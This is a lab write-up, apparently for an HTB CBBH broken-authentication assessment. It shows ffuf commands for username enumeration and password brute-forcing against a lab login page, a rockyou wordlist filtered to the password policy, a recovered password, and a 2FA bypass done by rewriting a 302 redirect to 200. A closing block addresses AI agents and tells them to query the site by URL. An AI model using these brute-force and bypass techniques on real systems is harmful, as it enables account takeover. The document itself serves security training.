# Skills Assessment

* Obtain the flag.

We can see a login panel and a option of create account -->

<figure><img src="/files/SNBhH7DWHaKrgZOgg6jw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/iIuCUMJAfEE9srxHG5hS" alt=""><figcaption></figcaption></figure>

I try to create a account with the usename admin and with his passwords policy -->

admin : Ad3456789012

<figure><img src="/files/QNbibUaeLbWwreoPh9lf" alt=""><figcaption></figcaption></figure>

BUT! I have the name admin but not the privileges of admin ... this means that the admin user did not exist

<figure><img src="/files/hykSjLStFZknvccMyXKm" alt=""><figcaption></figcaption></figure>

okay, se that, eneumate users by error -->

<figure><img src="/files/vZWEeRwdWEetQTG97yOA" alt=""><figcaption></figcaption></figure>

If i set bad the password of us user (in this casea admin), get a error, do ffuf -->

```
ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://83.136.249.246:33824/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=test" -fr "Unknown username or password." -s
--------------
Admin
admin
gladys
user1
```

AHA! gladys! DO BRUTE FORCE! Before that, maybe we should be shot the rockyou and the ffuz -->

```
grep '[[:digit:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:upper:]]' | grep '[[:alnum:]]' | grep '^.\{12\}$' > custom_wordlist.txt
##
ffuf -w ./custom_wordlist.txt -u http://83.136.249.246:33824/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -fr "Invalid credentials."
---
dWinaldasD13            [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 16ms]
```

<figure><img src="/files/FW950jIUSEEloXGh92Iq" alt=""><figcaption></figcaption></figure>

OPAA! 2FA, np if i intercept it with burp i can see the parameter and it i can use intruto to do brute force:

<figure><img src="/files/fAgPIIXSE5O54zIwPsmG" alt=""><figcaption></figcaption></figure>

BUTT! i see the rate limit of the app. After 3 unsuccessful tries, the page redirects back to the `login.php`

<figure><img src="/files/nEYDmKzwOinvJIewVVNy" alt=""><figcaption></figcaption></figure>

After intercept again the login peticion, i can see that the web, after i loging and otorgate the cookie, he response redirect me to `/2fa.php`, me question is... can i redirect me to `profile.php` direct and bypass the 2fa ??? -->

<figure><img src="/files/c1Q8dZz64TrRPqPbg8WI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2Edgx5ibZmLRqWzYFtIK" alt=""><figcaption></figcaption></figure>

Apparently IT FOUND... but he get us 302 found... maybe change to 200 OK -->

<figure><img src="/files/RQkKa7fC4h8IifjJxeGx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ur74z52HwXVzGIXkKJNr" alt=""><figcaption></figcaption></figure>

HAHAHA NICE


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/broken-authentication/skills-assessment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.